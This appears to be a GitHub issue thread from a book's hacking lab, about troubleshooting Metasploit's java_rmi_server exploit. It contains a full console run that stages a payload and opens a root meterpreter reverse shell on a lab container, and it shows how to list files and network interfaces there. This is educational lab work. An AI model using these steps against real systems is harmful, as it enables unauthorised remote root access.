Open robertwatkins opened 7 years ago
Hmm, so I am able to reproduce this but not immediately sure what the issue is. I will start digging into this although likely not to make too much progress until this weekend.
The exploit should send the first stager and then that stager should trigger an HTTP request to the URL that metasploit serves the actual payload from (http://192.100.200.166:8080/F2PdPb). Metasploit seems to be complaining that it doesn't get that connect back....
Might be worth trying to play with the HTTPDELAY option to see if it helps.
thanks for the reply ( I never know if it's something on my side or something in general). I tried modifying the HTTPDELAY, but the message appears before the delay starts it's countdown.
I'm enjoying the book and the lab very much and may just take this opportunity to dig into docker a bit and look at how this lab is set up.
Really glad you are enjoying the book and labs! I am sorry about all the bugs but really appreciate the bug reports, so keep em coming. Will give an update as soon as I get a chance to really dig into this issue.
It is definitely on my list of things I would like to add to the wiki is some more details about how the lab works underneath the hood. The code isn't particularly pretty and I am doing some funky stuff to setup the network manually.
@robertwatkins - ok, so I actually don't know what the issue is that caused this, but I was able to resolve it by just updating Metasploit. If you run sudo msfupdate
from the command line this should update the version of msfconsole. Metasploit is a fast moving project at times, which is great in that you always have fresh exploits, but can also mean it has more opportunity to introduce bugs and break stuff.
Below is a quick run through of exploiting this. Notice that it says it fails and doesn't drop you to a meterpreter shell but if you use the 'sessions' command you are able to interact successfully.
msf > use exploit/multi/misc/java_rmi_server
msf exploit(java_rmi_server) > ping sploit
[*] exec: ping sploit
PING sploit.labs (10.100.200.134) 56(84) bytes of data.
64 bytes from sploit.labs (10.100.200.134): icmp_seq=1 ttl=63 time=0.065 ms
64 bytes from sploit.labs (10.100.200.134): icmp_seq=2 ttl=63 time=0.133 ms
64 bytes from sploit.labs (10.100.200.134): icmp_seq=3 ttl=63 time=0.056 ms
^CInterrupt: use the 'exit' command to quit
msf exploit(java_rmi_server) > set RHOST 10.100.200.134
RHOST => 10.100.200.134
msf exploit(java_rmi_server) > exploit
[*] Started reverse TCP handler on 192.168.56.101:4444
[*] 10.100.200.134:1099 - Using URL: http://0.0.0.0:8080/bnfB2s2cmKl
[*] 10.100.200.134:1099 - Local IP: http://192.100.200.121:8080/bnfB2s2cmKl
[*] 10.100.200.134:1099 - Server started.
[*] 10.100.200.134:1099 - Sending RMI Header...
[*] 10.100.200.134:1099 - Sending RMI Call...
[*] 10.100.200.134:1099 - Replied to request for payload JAR
[*] Sending stage (49645 bytes) to 192.168.56.1
[*] Meterpreter session 2 opened (192.168.56.101:4444 -> 192.168.56.1:52680) at 2017-05-07 13:03:37 -0500
[-] 10.100.200.134:1099 - Exploit failed: RuntimeError Timeout HTTPDELAY expired and the HTTP Server didn't get a payload request
[*] 10.100.200.134:1099 - Server stopped.
[*] Exploit completed, but no session was created.
msf exploit(java_rmi_server) > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
2 meterpreter java/linux root @ sploit 192.168.56.101:4444 -> 192.168.56.1:52680 (10.100.200.134)
msf exploit(java_rmi_server) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > ls
Listing: /
==========
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100667/rw-rw-rwx 0 fil 2017-05-07 13:02:49 -0500 .dockerenv
40666/rw-rw-rw- 4096 dir 2016-09-16 18:53:14 -0500 bin
40666/rw-rw-rw- 4096 dir 2008-04-15 00:53:59 -0500 boot
40666/rw-rw-rw- 2860 dir 2017-05-07 13:02:49 -0500 dev
40666/rw-rw-rw- 4096 dir 2017-05-07 13:03:15 -0500 etc
40666/rw-rw-rw- 4096 dir 2008-04-15 00:53:59 -0500 home
40666/rw-rw-rw- 4096 dir 2016-09-16 18:52:56 -0500 initrd
40666/rw-rw-rw- 4096 dir 2016-09-16 18:59:27 -0500 lib
40666/rw-rw-rw- 4096 dir 2016-09-16 18:52:56 -0500 media
40666/rw-rw-rw- 4096 dir 2008-04-15 00:53:59 -0500 mnt
40666/rw-rw-rw- 4096 dir 2016-09-16 18:52:56 -0500 opt
40666/rw-rw-rw- 0 dir 2017-05-07 13:02:49 -0500 proc
40666/rw-rw-rw- 4096 dir 2016-09-16 18:52:56 -0500 root
40666/rw-rw-rw- 4096 dir 2016-09-16 18:59:33 -0500 sbin
40666/rw-rw-rw- 4096 dir 2016-09-16 18:52:56 -0500 srv
100666/rw-rw-rw- 195 fil 2016-09-16 18:35:23 -0500 start_sploits.sh
40666/rw-rw-rw- 0 dir 2017-05-07 13:02:49 -0500 sys
40666/rw-rw-rw- 4096 dir 2017-05-07 13:03:38 -0500 tmp
40666/rw-rw-rw- 4096 dir 2016-09-16 18:59:36 -0500 usr
40666/rw-rw-rw- 4096 dir 2016-09-16 18:59:37 -0500 var
40666/rw-rw-rw- 4096 dir 2016-09-16 18:59:22 -0500 vuln
meterpreter > ifconfig
Interface 1
============
Name : sw2_6 - sw2_6
Hardware MAC : 00:00:00:00:00:00
IPv4 Address : 10.100.200.134
IPv4 Netmask : 255.0.0.0
IPv6 Address : fe80::1428:ecff:fefa:9962
IPv6 Netmask : ::
Interface 2
============
Name : lo - lo
Hardware MAC : 00:00:00:00:00:00
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ::
meterpreter >
very cool. I was able to see what you see. Though before I read your commands to ensure I was on the same server, I used cat /etc/hostname
to see that I was on 'sploit'
Thanks again. On to the next lab :)
I'm not able to run the java_rmi_server exploit successfully, each time, I get a message "Meterpreter session X closed. Reason: Died"
Looking at the wireshark traces on port 4444 and using (follow>tcp stream), I see what appears to be the staging jar files being sent, and then the connection starts to show a few [psh,ack] and then [rst,ack]. Does this show the meterpreter dying?
Regardless, is there something I can do to get this exploit to work?
=============================== Wireshark Captures java_rmi_server.zip java_rmi_server.port4444.zip
=============================== Metasploit console